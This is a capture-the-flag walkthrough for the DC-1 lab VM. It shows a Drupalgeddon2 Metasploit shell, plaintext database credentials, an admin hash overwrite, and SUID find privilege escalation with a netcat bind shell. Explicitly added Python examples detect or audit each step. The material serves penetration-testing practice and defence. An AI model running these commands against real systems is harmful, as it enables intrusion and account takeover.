Target information

DESCRIPTION
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

TECHNICAL INFORMATION
DC-1 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven't tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
This is the first vulnerable lab challenge that I've created, so feel free to let me know what you think of it.

I can be contacted via Twitter - @DCAU7

Information gathering

After deploying the target VM, run an nmap sweep to get the IP addresses: one is Kali's, the other is the target's. Then scan the target's open ports.

# Ping sweep of the hosts in the subnet
nmap -sP 10.0.0.0/24
# Scan the target's ports
nmap -p 1-65535 10.0.0.17

Port 80 is open, so try visiting it in a browser.

Checking the site's robots.txt turns up nothing useful.

Scanning the site's directories with dirb also turns up nothing useful.

dirb http://10.0.0.17

Getting a shell with msfconsole

# Search for Drupal-related exploits
search drupal

flag1

Any of the exploits found can be tried; here I go straight to exploit/unix/webapp/drupal_drupalgeddon2 to get a shell.

use exploit/unix/webapp/drupal_drupalgeddon2
show options
# Fill in the parameters according to the output
set rhosts 10.0.0.17
run
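For the defender's side of the Metasploit step above, here is an added example (not code from the original writeup or from Drupal) that scans Apache access-log lines for the Drupalgeddon2 indicator: a '#' (URL-encoded as %23) inside a request's query parameters. Drupal reserves '#'-prefixed keys for Form API render arrays, so no legitimate client ever sends one. The log lines are constructed for the example; the IP addresses and timestamps in them are made up.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed Apache combined-format log lines for this example: the first two mimic
# what a Drupalgeddon2 probe against /user/register leaves behind, the rest are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2021:11:20:11 +0000] "GET /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Feb/2021:11:20:12 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2021:11:21:03 +0000] "GET /robots.txt HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2021:11:21:40 +0000] "POST /user/login?destination=node/1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def injected_params(target):
    """Names of query parameters whose name or value carries a '#' after URL decoding.

    Drupal's Form API keeps render-array keys (#type, #post_render, ...) under '#',
    so a '#' arriving in element_parents or any form field is the Drupalgeddon2
    signature. Decoding twice also catches the double-encoded form %2523.
    """
    decoded = unquote(unquote(target))
    _, _, query = decoded.partition('?')
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if '#' in name or '#' in value]


def scan_log(text):
    """Return (ip, method, target, params) for each suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = injected_params(rec['target'])
        if params:
            hits.append((rec['ip'], rec['method'], rec['target'], params))
    return hits


if __name__ == '__main__':
    for ip, method, target, params in scan_log(SAMPLE_LOG):
        print(f'{ip} {method} {target} <- render-array key in {params}')
```

The access log only records the query string; the injected form values also travel in the POST body, so for full coverage the same check belongs in a WAF or mod_security rule that sees request bodies. Detection is a stopgap: the fix for the DC-1 box is upgrading Drupal to a patched release.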

Getting the shell and spawning an interactive one

shell
# Upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/sh")'

cat flag1.txt

flag2

Following the hint in flag1, the exact path of the configuration file can be found with a search engine.

head -30 ./sites/default/settings.php

flag3

The configuration file contains the database username and password in plain text, so log in to the database and take a look.

mysql -h 127.0.0.1 -u dbuser -p
# Password: R0ck3t

After logging in to the database, inspect the users table.

show databases;
use drupaldb;
show tables;
select * from users\G

The query returns two users, which should be the site's login accounts. Replacing the hashed pass field resets the password so we can log in to the site.

# Run the script from the current directory (/var/www) to get the hashed password
./scripts/password-hash.sh 123456

password: 123456        hash: $S$DXC8UhJ4xjdgUrL841EYyfEx9AcHLmR8MJz/3ULMeGUqZJBdXnEd

# Log in to the database and update the password
update drupaldb.users set pass='$S$DXC8UhJ4xjdgUrL841EYyfEx9AcHLmR8MJz/3ULMeGUqZJBdXnEd' where uid=1;
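The string password-hash.sh printed is Drupal 7's portable hash format: "$S$", one character encoding log2 of the iteration count, an 8-character salt, then the iterated SHA-512 result in Drupal's own base64 alphabet, truncated to 55 characters. What follows is an added example, not code from the writeup or from Drupal: a Python port of that scheme, plus an audit that flags exactly what the steps above do to the users table, namely uid 1's hash changing against a saved baseline, and hashes with a cost below Drupal 7's default of 2^15. The user rows and the baseline hashes are constructed; the uid 1 hash is the one printed above.

```python
import hashlib
import hmac

# Drupal's base64 alphabet (password.inc). The character after "$S$" is the
# position in this alphabet of log2(iteration count): 'D' -> 15 -> 32768 rounds.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55          # DRUPAL_HASH_LENGTH: stored hashes are truncated to this
DEFAULT_LOG2 = 15         # DRUPAL_HASH_COUNT in Drupal 7
MIN_LOG2, MAX_LOG2 = 7, 30


def _encode64(data: bytes) -> str:
    """Drupal/phpass base64: 3 bytes -> 4 chars, little-endian, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def parse_setting(stored: str) -> dict:
    """Split a $S$ hash into cost, salt and digest; raise ValueError on anything else."""
    if len(stored) != HASH_LENGTH or not stored.startswith('$S$'):
        raise ValueError('not a Drupal 7 SHA-512 hash')
    count_log2 = ITOA64.index(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError('iteration count out of range')
    return {'count_log2': count_log2, 'iterations': 1 << count_log2,
            'salt': stored[4:12], 'digest': stored[12:]}


def drupal_hash(password: str, salt: str, count_log2: int = DEFAULT_LOG2) -> str:
    """Recompute a Drupal 7 hash for a given salt and cost (what _password_crypt does)."""
    if len(salt) != 8 or not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError('salt must be 8 chars and cost within range')
    pw = password.encode('utf-8')
    digest = hashlib.sha512(salt.encode('ascii') + pw).digest()
    for _ in range(1 << count_log2):          # 32768 rounds at the default cost
        digest = hashlib.sha512(digest + pw).digest()
    return ('$S$' + ITOA64[count_log2] + salt + _encode64(digest))[:HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """True if password matches stored, compared in constant time."""
    p = parse_setting(stored)
    return hmac.compare_digest(drupal_hash(password, p['salt'], p['count_log2']), stored)


# Hash printed by password-hash.sh in the writeup for the password 123456
RESET_HASH = '$S$DXC8UhJ4xjdgUrL841EYyfEx9AcHLmR8MJz/3ULMeGUqZJBdXnEd'

# Constructed baseline of hashes saved from a known-good state (placeholder passwords/salts)
BASELINE = {
    1: drupal_hash('original-admin-password', 'abcdefgh'),
    2: drupal_hash('second-user-password', 'ijklmnop'),
}
# Constructed rows as `select uid, name, pass from users` might return them after the
# reset above; uid 0 is Drupal's anonymous row and has an empty pass.
SAMPLE_ROWS = [
    {'uid': 0, 'name': '', 'pass': ''},
    {'uid': 1, 'name': 'admin', 'pass': RESET_HASH},
    {'uid': 2, 'name': 'user2', 'pass': BASELINE[2]},
    {'uid': 3, 'name': 'legacy', 'pass': drupal_hash('pw', 'qrstuvwx', 11)},  # under-cost
]


def audit_users(rows, baseline):
    """Return (uid, reason) for changed, unparseable or under-cost hashes."""
    findings = []
    for row in rows:
        uid, stored = row['uid'], row['pass']
        if not stored:
            continue
        try:
            p = parse_setting(stored)
        except ValueError as err:
            findings.append((uid, f'unparseable hash: {err}'))
            continue
        if p['count_log2'] < DEFAULT_LOG2:
            findings.append((uid, f"cost 2^{p['count_log2']} below default 2^{DEFAULT_LOG2}"))
        if uid in baseline and baseline[uid] != stored:
            findings.append((uid, 'hash changed since baseline'))
    return findings


if __name__ == '__main__':
    print(parse_setting(RESET_HASH))
    for uid, reason in audit_users(SAMPLE_ROWS, BASELINE):
        print(f'uid {uid}: {reason}')
```

Running audit_users periodically against a baseline catches an out-of-band reset like the UPDATE above; the deeper fix is that the web application's database account should not be the one an attacker reads out of settings.php with full write access to users, and that settings.php itself should be unreadable to anything but the web server process.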

After changing the password, log in to the site.

After logging in, flag3 is obtained.

flag4

Look at /etc/passwd to find flag4.

flag5

Finally, privilege escalation through the SUID bit on the find command.

  • SUID is a Linux permission mechanism: a file with this bit set runs with its owner's privileges, so the caller temporarily gains the owner's rights while it executes. If a root-owned binary or tool on the system has SUID set, it can be used to escalate to root.

# Find SUID binaries that grant root privileges
find / -perm -4000 2>/dev/null

# Abuse find's SUID bit to escalate
# find runs with SUID, so the shell it spawns inherits that privilege
find ./ -exec "/bin/sh" \;

# Alternatively, use netcat to get a root shell from Kali
find ./ -exec netcat -lvp 5555 -e /bin/sh \;
# Run on Kali
netcat 10.0.0.17 5555
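An added example (not from the writeup) for the defensive side of the SUID step: enumerate setuid files the way `find / -perm -4000` does, compare them against a baseline of binaries that are expected to be setuid, and flag any that can hand the caller a shell, as find does on DC-1. The directory tree demo() audits is constructed (the setuid bit can be set on your own files without root), and the expected and shell-capable lists are starter lists written for this example, not a complete reference.

```python
import os
import stat
import tempfile

# Setuid binaries that can hand the caller a shell or run arbitrary commands; a
# starter list for this example (find is the one abused on DC-1). Extend it from
# your own review of what is setuid on your systems.
SHELL_CAPABLE = {'find', 'vim', 'vi', 'nano', 'less', 'more', 'awk', 'env',
                 'python', 'python3', 'perl', 'bash', 'sh', 'nmap'}


def find_suid(root='/'):
    """Return [(path, owner uid)] for every regular file under root with the setuid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                # lstat: do not follow symlinks
            except OSError:                        # unreadable or vanished, skip it
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def classify(entries, expected, root_only=True):
    """Split setuid findings into (unexpected, shell_capable) path lists.

    expected: paths that legitimately carry setuid on this system (the baseline).
    root_only: ignore setuid files not owned by root, since only those yield root.
    """
    unexpected, dangerous = [], []
    for path, uid in entries:
        if root_only and uid != 0:
            continue
        if path not in expected:
            unexpected.append(path)
        if os.path.basename(path) in SHELL_CAPABLE:
            dangerous.append(path)
    return unexpected, dangerous


def demo():
    """Audit a constructed tree: usr/bin/find and usr/bin/passwd setuid, usr/bin/ls not."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, 'usr', 'bin')
        os.makedirs(bindir)
        for name, mode in (('find', 0o4755), ('passwd', 0o4755), ('ls', 0o755)):
            path = os.path.join(bindir, name)
            with open(path, 'w') as fh:
                fh.write('#!/bin/sh\n')            # stand-in for a real binary
            os.chmod(path, mode)
        expected = {os.path.join(bindir, 'passwd')}  # baseline: passwd is legitimately setuid
        found = find_suid(root)
        # The files are owned by us, not root, so disable the root-owner filter here.
        unexpected, dangerous = classify(found, expected, root_only=False)
        return (sorted(os.path.basename(p) for p, _ in found),
                sorted(os.path.basename(p) for p in unexpected),
                sorted(os.path.basename(p) for p in dangerous))


if __name__ == '__main__':
    found, unexpected, dangerous = demo()
    print('setuid:', found, 'unexpected:', unexpected, 'shell-capable:', dangerous)
    # For a real audit: classify(find_suid('/'), your_baseline_set)
```

On the DC-1 box the finding would be /usr/bin/find, and the remediation is simply `chmod u-s` on it, since find has no need for setuid; keeping the expected set under version control and diffing the audit output on a schedule turns the same enumeration the writeup uses into a change alarm.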
